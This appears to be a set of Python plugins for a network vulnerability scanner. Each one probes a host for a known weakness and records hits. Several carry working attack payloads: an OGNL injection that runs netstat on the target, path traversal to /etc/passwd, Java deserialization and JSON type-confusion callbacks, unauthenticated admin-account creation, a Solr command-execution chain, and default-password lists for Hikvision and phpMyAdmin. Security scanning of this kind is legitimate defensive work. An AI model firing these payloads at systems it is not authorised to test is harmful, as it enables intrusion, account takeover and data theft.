Esempio n. 1
0
def check(host, port=5601):
    """Probe two API paths that should not answer without a login.

    Each URI is fetched with GET; the first reply whose body contains one of
    the marker strings and whose status is 200 or 404 is reported as a hit
    and its JSON body becomes ``output``. Anything else - including any
    exception (network error, non-JSON body) - yields ``False``.

    Returns ``(True, host, url, parsed_json)`` or ``False``.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/elasticsearch/404adqweqw/_mapping/field/*?_=1569226048367&ignore_unavailable=false&allow_no_indices=false&include_defaults=true',
        '/api/saved_objects/_find?type=index-pattern&fields=title&per_page=10'
    ]
    # Either marker counts: the 404 case is the index_not_found error body,
    # the 200 case a saved_objects listing.
    hits = ['"type":"index_not_found_exception","reason', '"saved_objects":[']
    accepted_status = (404, 200)

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for uri in uris:
                url = '{}{}'.format(base, uri)
                response = session.get(url, timeout=7, verify=False)
                body = response.text
                matched = any(marker in body for marker in hits)
                if matched and response.status_code in accepted_status:
                    output = response.json()
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 2
0
def check(host, port=80):
    """Look for commonly named PDF documents exposed under the web root.

    Each candidate path gets a HEAD request; the first one answered with
    status 200 and a Content-Type containing ``application/pdf`` is reported
    with its response headers as ``output``.

    Returns ``(True, host, url, headers)`` on a hit, otherwise ``False``
    (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    candidates = [
        '/doc.pdf', '/help.pdf', '/wendang.pdf', '/api.pdf', '/web.pdf',
        '/dev.pdf', '/bangzhu.pdf', '/kaifa.pdf', '/帮助.pdf', '/说明.pdf',
        '/手册.pdf'
    ]
    markers = ['application/pdf']

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for uri in candidates:
                url = '{}{}'.format(base, uri)
                response = session.head(url, timeout=7, verify=False)
                # str() turns a missing header into 'None' instead of raising.
                content_type = str(response.headers.get('content-type'))
                is_pdf = any(marker in content_type for marker in markers)
                if is_pdf and response.status_code == 200:
                    output = response.headers
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 3
0
def check(host, port=80):
    """Test whether ``POST /api/users`` creates an account without authentication.

    Sends a fixed user record with ``has_admin_role`` set and counts a hit on
    status 201 (created) or 409 (already exists, e.g. from an earlier run).
    The first entry of ``hits`` is the empty string, which every body
    contains, so the text match never filters anything - the status decides.

    Returns ``(True, host, url, data)`` - ``output`` is the request body, not
    the response - otherwise ``False`` (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/api/users']
    # '' is a substring of any text, so only the status check matters.
    hits = ['', 'username has already been used!']
    # NOTE(review): a 201 means a real account was created on the target and
    # nothing here removes it; a positive run needs manual cleanup.
    data = {
        "username": "******",
        "email": "*****@*****.**",
        "realname": "opsbiu",
        "password": "******",
        "comment": "12",
        "has_admin_role": True
    }

    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.post(target,
                                        json=data,
                                        timeout=7,
                                        verify=False)
                for hit in hits:
                    if hit in response.text and response.status_code in [
                            201, 409
                    ]:
                        output = data
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 4
0
def check(host, port=80):
    """Try a short list of default passwords for ``admin`` on a Hikvision device.

    Runs only when ``is_hikvision(target)`` accepts the host. Each pair is
    sent as HTTP basic auth to ``/PSIA/Custom/SelfExt/userCheck``; a body
    containing ``<statusValue>200</statusValue>`` is treated as a successful
    login and the check stops at the first one.

    Returns ``(True, host, url, output)`` where ``output`` lists the accepted
    credentials (Chinese labels: 用户名 = username, 密码 = password) followed by
    the response body; otherwise ``False`` (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    try:
        if not is_hikvision(target):
            return False
        target = '{}/PSIA/Custom/SelfExt/userCheck'.format(target)
        users = ['admin']
        passwords = ['12345', '123456', '1234567', '00000']
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for password in passwords:
                for user in users:
                    response = session.get(target,
                                           timeout=7,
                                           verify=False,
                                           auth=(user, password))
                    if '<statusValue>200</statusValue>' in response.text:
                        output = '用户名:{}\t密码:{}\n{}'.format(
                            user, password, response.text)
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    # Bare except also swallows KeyboardInterrupt/SystemExit; the sibling
    # checks use `except Exception`.
    except:
        return False
    return False
Esempio n. 5
0
def check(host, port=80):
    """Path-traversal probe through the ``ROCK_LANG`` cookie on a rockmongo login page.

    Both candidate login pages are requested with a cookie whose value climbs
    out of the web root to ``/etc/passwd`` (NUL-terminated); ``root:x:0`` in
    the response body is taken as confirmation and the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also on
    any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/index.php?action=login.index&host=0',
        '/rockmongo/index.php?action=login.index&host=0'
    ]
    hits = ['root:x:0']

    headers = {}
    headers[
        'Cookie'] = 'ROCK_LANG=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00'

    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target,
                                       headers=headers,
                                       timeout=7,
                                       verify=False)
                for hit in hits:
                    if hit in response.text:
                        # NOTE(review): the full /etc/passwd content is
                        # persisted as evidence; consider storing only the
                        # matched line to minimise retained target data.
                        output = response.text
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 6
0
def check(host, port=80):
    """Expression-injection probe through the ``debug=browser`` query string.

    The single URI embeds an OGNL-style expression that, if evaluated by the
    server, runs ``netstat -an`` and writes the output into the response.
    The markers are strings typical of netstat output; any one of them in
    the body is a hit and the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also on
    any exception). A longer 10 s timeout is used than in the sibling checks.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an'
    ]
    hits = [
        'Active Connections', 'Active Internet connections', 'ESTABLISHED',
        'CLOSE_WAIT', 'TIME_WAIT'
    ]
    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=10, verify=False)
                for hit in hits:
                    if hit in response.text:
                        # NOTE(review): a hit means a command actually ran on
                        # the target; the netstat listing is kept verbatim.
                        output = response.text

                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 7
0
def check(host, port=80):
    """Probe ``/plugins/servlet/gadgets/makeRequest`` with a malformed ``url`` value.

    The ``url`` parameter points back at the scanned host and ends with ``@``
    (an authority with an empty host part). A body carrying the Java
    ``IllegalArgumentException: Host name may not be null`` text is the hit;
    the whole body is stored. ``X-Atlassian-Token: no-check`` is sent,
    presumably to satisfy the servlet's XSRF check. The 25 s timeout is
    longer than elsewhere, presumably to allow for the server-side fetch.

    Returns ``(True, host, url, body)`` or ``False`` (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        '/plugins/servlet/gadgets/makeRequest?url={}://{}:{}@'.format(
            scheme, host, port)
    ]
    hits = ['java.lang.IllegalArgumentException: Host name may not be null']

    headers = {'X-Atlassian-Token': 'no-check'}

    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target,
                                       timeout=25,
                                       headers=headers,
                                       verify=False)
                for hit in hits:
                    if hit in response.text:
                        output = response.text
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 8
0
def check(host, port=443):
    """Post a JSON document carrying a DNS-callback hostname and watch for the lookup.

    ``get_dns_payload()`` yields a unique subdomain and the hostname to embed;
    the body maps ``c`` to a ``java.net.InetAddress``-typed object whose
    ``val`` is that hostname. After each POST - whether it succeeded or not -
    ``have_record(subdomain)`` is consulted and a recorded lookup is a hit.

    Returns ``(True, host, url, payload_dns)`` on a hit, otherwise ``False``
    (also when any part of the outer block raises).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)

    subdomain, payload_dns = get_dns_payload()
    uris = [
        '/3.0/authService/config', '/2.0/authService/config',
        '/1.0/authService/config'
    ]
    payload = {
        "c": {
            "@type": "java.net.InetAddress",
            "val": payload_dns
        },
        "b": {}
    }
    try:
        with requests.Session() as session:
            requests.packages.urllib3.disable_warnings()
            targets = ['{}{}'.format(target, uri) for uri in uris]
            for target in targets:
                try:
                    session.post(target, json=payload, timeout=5, verify=False)
                # POST failures are deliberately ignored so the remaining
                # URIs are still tried.
                except:
                    pass
                finally:
                    # Runs after every POST. If the lookup surfaces late it
                    # is attributed to whichever URI is current at that time,
                    # not necessarily the one that triggered it.
                    if have_record(subdomain):
                        insert_vuln_db(host, target, payload_dns, plugin_id)
                        return True, host, target, payload_dns
        return False
    except:
        return False
def check(host, port=80):
    """Try the ``admin``/``admin`` login on a ``login.index`` page.

    POSTs the fixed form-encoded credentials in ``data`` and treats
    ``server.createDatabase`` in the response - presumably only rendered
    once logged in - as a successful login; the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/index.php?action=login.index']
    hits = ['server.createDatabase']
    data = "more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3"
    headers = {}

    # data is a pre-encoded string, so the content type must be set by hand.
    headers['Content-Type'] = 'application/x-www-form-urlencoded'

    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.post(target,
                                        headers=headers,
                                        data=data,
                                        timeout=7,
                                        verify=False)
                for hit in hits:
                    if hit in response.text:
                        output = response.text
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 10
0
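def check(host, port=6379):
    """Check whether a Redis instance answers ``INFO`` without authentication.

    Opens a TCP connection, sends ``INFO`` and reads one reply chunk.
    ``redis_version`` in the reply means the command ran unauthenticated;
    ``Authentication`` means the server asked for a password.

    Returns ``(True, host, target, response)`` on an unauthenticated reply,
    ``False`` otherwise (auth required, unrecognised reply, or any error).
    The original fell off the end and returned ``None`` for unrecognised
    replies; callers expect a bool-or-tuple, so that path now returns False.
    """
    try:
        with socket.create_connection((host, port), timeout=5) as conn:
            # sendall() retries partial writes; send() may leave bytes unsent.
            conn.sendall(b"INFO\r\n")
            # One chunk suffices: the version field is expected near the top
            # of the INFO reply.
            response = str(conn.recv(2048), 'utf-8', 'ignore')
            if 'redis_version' in response:
                target = "{}:{}".format(host, port)
                # The INFO dump is returned to the caller but an empty string
                # is persisted, as in the original; keep it that way.
                insert_vuln_db(host, target, "", plugin_id)
                return True, host, target, response
    except Exception:
        return False
    return False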
Esempio n. 11
0
def check(host, port=80):
    """Try a small set of weak phpMyAdmin credentials on the root and ``/phpmyadmin`` paths.

    URLs that ``is_phpmyadmin`` rejects are skipped. For the rest, four user
    names are tried against every ``user+password`` combination built from
    ``simple_users`` (which includes the host's first label) and
    ``simple_passwords``. A fresh login token is fetched before every
    attempt; a body still containing ``login_form`` is a failed attempt, a
    200 containing ``db_structure.php`` is a successful login.

    Returns ``(True, host, url, output)`` with the accepted credentials
    (Chinese labels: 用户名 = username, 密码 = password); ``False`` when no
    token could be obtained, on any exception, or when nothing matched.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)

    urls = [target, '{}/phpmyadmin/index.php'.format(target)]
    try:
        for url in urls:
            if not is_phpmyadmin(url):
                continue
            simple_passwords = [
                '', '123', '1234', '12345', '123456', '!@#', '1111', '111',
                '666', '1314'
            ]
            simple_users = [
                '', 'root', 'test', 'admin', 'server', 'password', 'mysql',
                'ceshi', 'mima',
                host.split('.')[0]
            ]
            # Cartesian product: every password is prefixed by every user.
            passwords = [
                '{}{}'.format(user, password) for user in simple_users
                for password in simple_passwords
            ]
            for user in ['root', 'test', 'server', 'ceshi']:
                for pwd in passwords:
                    # One token per attempt, i.e. one extra GET per request.
                    token = get_token(url)
                    if not token:
                        # Aborts the whole check, including any later URL.
                        return False
                    data = {
                        "pma_username": user,
                        "pma_password": pwd,
                        "server": 1,
                        "token": token
                    }
                    requests.packages.urllib3.disable_warnings()
                    # data is passed positionally (second argument of
                    # requests.post); no verify=False here, unlike siblings.
                    response = requests.post(
                        url,
                        data,
                        timeout=7,
                        headers={'Cookie': "pma_lang=zh_CN"})
                    if 'login_form' in response.text:
                        continue
                    elif response.status_code == 200 and 'db_structure.php' in response.text:
                        output = "用户名:{}\t 密码:{}".format(user, pwd)
                        target = url
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except:
        return False
    return False
Esempio n. 12
0
def check(host, port=5901):
    """Report a VNC server that accepts the ``None`` authentication type.

    ``check_anonymous`` decides whether the server offers it and hands back
    a client object; ``auth("None")`` is then attempted and a zero status
    code is a hit. The connection is closed before the result is evaluated.

    Returns ``(True, host, target, output)`` - ``output`` is the Chinese
    label 开启匿名访问 ("anonymous access enabled") - otherwise ``False`` (also
    on any exception).
    """
    target = '{}:{}'.format(host, port)
    try:
        anonymous_offered, vnc = check_anonymous(host, port)
        if not anonymous_offered:
            return False
        code, msg = vnc.auth("None")
        vnc.disconnect()
        if code != 0:
            return False
        output = '开启匿名访问'
        insert_vuln_db(host, target, output, plugin_id)
        return True, host, target, output
    except:
        return False
Esempio n. 13
0
def check(host, port=80):
    """Post a ysoserial ``JRMPClient`` payload to ``/invoker/readonly`` and watch for a DNS callback.

    ``new_dns_payload()`` supplies the marker (``payload_str``) and the
    hostname the gadget should resolve. The POST is best-effort - any error
    is ignored - and the verdict comes solely from
    ``have_records(payload_str)``.

    Returns ``(True, host, target, payload_str)`` on a recorded lookup,
    otherwise ``False``.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}/invoker/readonly'.format(scheme, host, port)
    payload_str, payload_dns = new_dns_payload()
    payload = Ysoserial().generate(payload='JRMPClient', command=payload_dns)
    try:
        # Certificate verification stays on here (no verify=False), so an
        # https target with an untrusted certificate is silently skipped.
        requests.post(target, data=payload, timeout=10)
    except:
        pass
    # NOTE(review): have_records() and insert_vuln_db() run outside the try,
    # so an error there propagates to the caller instead of yielding False.
    # The other DNS-callback checks call have_record() (singular) - confirm
    # both helpers exist.
    results = have_records(payload_str)
    if results:
        output = payload_str
        insert_vuln_db(host, target, output, plugin_id)
        return True, host, target, output
    return False
Esempio n. 14
0
def check(host, port=80):
    """Injection probe against ``/index.php/component/users`` using a random marker.

    ``gen_pay('print_r', check_string)`` builds a payload that, if executed,
    echoes the random 20-character string; ``make_req`` sends it and returns
    the response text. Using a per-run random marker avoids false positives
    from static strings that might already appear on the page.

    Returns ``(True, host, target, output)`` - ``output`` holds the marker and
    the response (Chinese labels: 验证字符串 = verification string, 请求响应 =
    response) - otherwise ``False`` (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    url = '{}/index.php/component/users'.format(target)
    check_string = random_string(20)
    hit = check_string

    try:

        response = make_req(url, gen_pay('print_r', check_string))
        if hit in response:
            output = '验证字符串: {}\n请求响应: {}'.format(hit, response)
            # target (the base URL) is recorded, not the url actually hit.
            insert_vuln_db(host, target, output, plugin_id)
            return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 15
0
def check(host, port=80):
    """Request ``/api/project/swagger_url`` and look for one exact JSON error reply.

    The hit condition is the literal body fragment
    ``{"errcode":40011,"errmsg":"请登录...","data":null}`` ("please log in"),
    which identifies the endpoint's presence. The whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also on
    any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/api/project/swagger_url?url=http://www.baidu.com']
    marker = '{"errcode":40011,"errmsg":"请登录...","data":null}'
    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for uri in uris:
                url = '{}{}'.format(base, uri)
                response = session.get(url, timeout=7, verify=False)
                if marker not in response.text:
                    continue
                output = response.text
                insert_vuln_db(host, url, output, plugin_id)
                return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 16
0
def check(host, port=80):
    """Check whether the web root accepts HTTP PUT by writing a file and reading it back.

    PUTs ``<timestamp>.txt`` with a random JSON body and then GETs the same
    URL; a body identical to what was sent means the upload persisted.

    Returns ``(True, host, url, output)`` - ``output`` is the Chinese label
    目标开启 http PUT ("target has HTTP PUT enabled") - otherwise ``False``
    (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    timestamp = int(time.time())
    target = '{}/{}.txt'.format(target, timestamp)
    try:
        file_content = '{}-{}'.format(random.random(), timestamp)
        # NOTE(review): disable_warnings() is called but neither request
        # passes verify=False, so an https target with an untrusted
        # certificate raises and the check reports False.
        requests.packages.urllib3.disable_warnings()
        # NOTE(review): the uploaded file is never removed, so a positive
        # result leaves an artifact on the target; a best-effort DELETE of
        # the same URL would be the responsible cleanup step.
        requests.put(target, json={'data': file_content}, timeout=7)
        response = requests.get(target, timeout=7)
        # json= wraps the content in {"data": ...}; an exact match therefore
        # only occurs if the server stores and returns the raw string.
        if response.text == file_content:
            output = '目标开启 http PUT'
            insert_vuln_db(host, target, output, plugin_id)
            return True, host, target, output
        else:
            return False
    except:
        return False
def check(host, port=80):
    """Double-encoded path-traversal probe under ``/foo/default/master/``.

    The URI uses ``..%252F`` segments (``%252F`` decodes to ``%2F`` and then
    to ``/``) to reach ``/etc/passwd``; ``root:x:0`` in the body is the hit
    and the body is stored behind a Chinese label (/etc/passwd文件内容 =
    "/etc/passwd file content").

    Returns ``(True, host, url, output)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = [
        "/foo/default/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd"]
    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=7, verify=False)
                if 'root:x:0' in response.text:
                    # NOTE(review): the full file is persisted as evidence;
                    # storing only the matched line would retain less data.
                    output = '/etc/passwd文件内容:\n{}'.format(response.text)
                    insert_vuln_db(host, target, output, plugin_id)
                    return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 18
0
def check(host, port=80):
    """Look for readable log files under a few common PHP application paths.

    First HEADs ``/loadg/biu404.log`` as a canary: a 200 there means the
    server answers everything with 200 and the check is skipped. Otherwise
    each ``php_path + log_file`` URL is HEADed; candidates that return
    200/301/302, were not redirected (``response.url == target``) and whose
    sibling ``<name>/abc.log`` does *not* return 200/301/302 are then GETed
    and filtered by size, absence of HTML markers and a non-json/html
    content type. The whole body is stored on a hit.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    log_files = [
        'debug.log', 'web.log', 'app.log', 'init.log', 'test.log',
        'install.log', 'api.log', 'access.log', 'user.log', 'deploy.log',
        'error.log', 'npm-debug.log'
    ]
    php_paths = ['app/', 'application/', 'log/', '']
    uris = [
        '/{}{}'.format(php_path, log_file) for php_path in php_paths
        for log_file in log_files
    ]
    try:

        # No verify=False anywhere in this check: https targets with an
        # untrusted certificate raise and end up as False.
        requests.packages.urllib3.disable_warnings()
        targets = ['{}{}'.format(target, uri) for uri in uris]

        check_error_response = requests.head(
            '{}/loadg/biu404.log'.format(target), timeout=7)
        if check_error_response.status_code != 200:
            with requests.Session() as session:
                for target in targets:
                    response = session.head(target, timeout=7)
                    if response.status_code in [
                            200, 301, 302
                    ] and response.url == target and session.head(
                            target.replace('.log', '/abc.log'),
                            timeout=7).status_code not in [200, 301, 302]:
                        response = session.get(target, timeout=7)
                        # NOTE(review): the second operand is not wrapped in
                        # str(); if the header is absent it is None and the
                        # concatenation raises TypeError. (requests header
                        # lookup is case-insensitive, so both gets return
                        # the same value.)
                        content_type = str(
                            response.headers.get('Content-Type')) + (
                                response.headers.get('content-type'))
                        # NOTE(review): Content-Length is a str (or None);
                        # comparing it with the int 10 raises TypeError on
                        # Python 3, which the bare except below turns into
                        # False - so this branch can never report a hit as
                        # written. int() the header (defaulting to 0) to
                        # make the size check effective.
                        if response.headers.get(
                                'Content-Length'
                        ) > 10 and '<div' not in response.text.lower(
                        ) and 'html>' not in response.text and 'json' not in content_type and 'html' not in content_type:
                            output = response.text
                            insert_vuln_db(host, target, output, plugin_id)
                            return True, host, target, output
    except:
        return False
    return False
Esempio n. 19
0
def check(host, port=80):
    """Look for a reachable Jolokia ``list`` endpoint.

    A HEAD request filters paths that answer 200 or 302; only those are then
    fetched with GET and matched against the logback ``JMXConfigurator``
    marker. Neither request passes ``verify=False`` (certificate
    verification stays on). The whole body is stored on a hit.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also on
    any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    paths = ['/jolokia/list', '/actuator/jolokia/list']
    marker = 'ch.qos.logback.classic.jmx.JMXConfigurator'
    reachable = (302, 200)
    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for path in paths:
                url = '{}{}'.format(base, path)
                probe = session.head(url, timeout=7)
                if probe.status_code not in reachable:
                    continue
                response = session.get(url, timeout=7)
                if marker in response.text:
                    output = response.text
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 20
0
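def check(host, port=80):
    """Fetch ``/composer.lock`` and hand it to ``checkLock`` for known-bad packages.

    The body is parsed as JSON once (the original parsed it twice); if the
    first entry of ``packages`` has a ``name`` key the document is passed to
    ``checkLock`` and a non-empty result is a hit. A non-JSON body, a missing
    or empty ``packages`` list, or a non-mapping entry raises and is reported
    as ``False``. No ``verify=False`` is passed, so certificate verification
    stays on for https targets.

    Returns ``(True, host, url, check_result)`` on a hit, otherwise ``False``
    (also on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = ["/composer.lock"]
    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=7)
                # Parse once and reuse; json() re-parses on every call.
                lock = response.json()
                if 'name' in lock.get('packages')[0].keys():
                    check_result = checkLock(lock)
                    # len() is kept on purpose: an unsized checkLock result
                    # raises and is reported as False, as before.
                    if len(check_result):
                        output = check_result
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception:
        return False
    return False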
Esempio n. 21
0
def check(host, port=10250):
    """Query ``/runningpods`` over https and report an unauthenticated pod listing.

    The scheme is always https regardless of the port. A 200 whose body
    contains ``"kind":"PodList"`` is a hit and the parsed JSON becomes
    ``output``; a non-JSON body raises and is reported as ``False``.

    Returns ``(True, host, url, pods_json)`` on a hit, otherwise ``False``
    (also on any exception).
    """
    base = 'https://{}:{}'.format(host, port)
    paths = ['/runningpods']
    markers = ['"kind":"PodList"']

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for path in paths:
                url = '{}{}'.format(base, path)
                response = session.get(url, timeout=7, verify=False)
                body = response.text
                matched = any(marker in body for marker in markers)
                if matched and response.status_code == 200:
                    output = response.json()
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 22
0
def check(host, port=80):
    """Template-expression evaluation probe on the nuxeo login page path.

    The URI carries ``${233*2333}``; if the server evaluates the expression
    the body contains the product ``543589``, which is the only marker. The
    whole body is stored on a hit.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    uris = ['/nuxeo/login.jsp/${233*2333}.xhtml']
    # 233 * 2333 == 543589; the marker is the evaluated arithmetic result.
    hits = ['543589']

    try:
        targets = ['{}{}'.format(target, uri) for uri in uris]
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for target in targets:
                response = session.get(target, timeout=7, verify=False)
                for hit in hits:
                    if hit in response.text:
                        output = response.text
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 23
0
def check(host, port=80):
    """Run the Solr core command-execution chain against every core found on the host.

    ``get_cores(host, port)`` lists core paths; for each one ``config(url)``
    is called first (presumably to change the core's configuration - confirm
    in the helper) and ``rce(url, 'dir')`` second. A response containing
    ``solr-webapp`` is the hit and the body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (no
    cores, no match, or any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    hits = ['solr-webapp']

    try:
        uris = get_cores(host, port)
        if len(uris):
            targets = ['{}{}'.format(target, uri) for uri in uris]
            for target in targets:
                # NOTE(review): config() is a state-changing request against
                # the target and nothing here restores the previous config.
                config(target)
                response = rce(target, 'dir')
                for hit in hits:
                    if hit in response.text:
                        output = response.text
                        # NOTE(review): the URL is passed as the output
                        # argument; sibling checks pass `output` here -
                        # likely a slip, confirm the intended evidence.
                        insert_vuln_db(host, target, target, plugin_id)
                        return True, host, target, output
    except Exception as error:
        return False
    return False
Esempio n. 24
0
def check(host, port=80):
    """Check whether ``templateFile`` renders ``README.md`` on a ThinkCMF site.

    A 200 response whose body contains the README opening ``ThinkCMF是一款``
    is a hit and the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    paths = ['/?a=display&templateFile=README.md']
    markers = ['ThinkCMF是一款']

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for path in paths:
                url = '{}{}'.format(base, path)
                response = session.get(url, timeout=7, verify=False)
                body = response.text
                matched = any(marker in body for marker in markers)
                if matched and response.status_code == 200:
                    output = body
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 25
0
def check(host, port=80):
    """Check whether ``/WEB-INF/web.xml`` is served directly.

    A 200 whose body contains a closing ``</web-app>`` or
    ``</servlet-mapping>`` tag is a hit and the whole body is stored.

    Returns ``(True, host, url, body)`` on a hit, otherwise ``False`` (also
    on any exception).
    """
    scheme = 'https' if '443' in str(port) else 'http'
    base = '{}://{}:{}'.format(scheme, host, port)
    paths = ['/WEB-INF/web.xml']
    markers = ['</web-app>', '</servlet-mapping>']

    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            for path in paths:
                url = '{}{}'.format(base, path)
                response = session.get(url, timeout=7, verify=False)
                body = response.text
                matched = any(marker in body for marker in markers)
                if matched and response.status_code == 200:
                    output = body
                    insert_vuln_db(host, url, output, plugin_id)
                    return True, host, url, output
    except Exception:
        return False
    return False
Esempio n. 26
0
def check(host, port=80):
    """Post a ``java.net.InetAddress``-typed JSON object with a DNS-callback hostname to several paths.

    ``get_dns_payload()`` yields the subdomain to watch and the hostname to
    embed. All five URIs are posted (30 s timeout each, so up to 150 s) and
    only afterwards ``have_record(subdomain)`` is consulted once.

    NOTE(review): unlike the sibling checks this never returns the hit
    tuple - a positive result is written to the DB but the function then
    falls off the end and returns ``None``; it also returns ``None`` (not
    ``False``) when nothing was recorded. Only an exception yields ``False``.
    Callers treating the result as bool-or-tuple will miss hits here. Also,
    the first POST that raises aborts the remaining URIs, whereas the other
    DNS-callback check wraps each POST individually.
    """
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)

    subdomain, payload_dns = get_dns_payload()

    uris = ['/', '/api', '/api/login', '/api/log', '/log']
    payload = {"@type": "java.net.InetAddress", "val": payload_dns}
    try:
        requests.packages.urllib3.disable_warnings()
        with requests.Session() as session:
            targets = ['{}{}'.format(target, uri) for uri in uris]
            for url in targets:
                session.post(url, json=payload, timeout=30, verify=False)

            # Recorded against the base URL, not the URI that triggered it.
            if have_record(subdomain):
                insert_vuln_db(host, target, payload_dns, plugin_id)
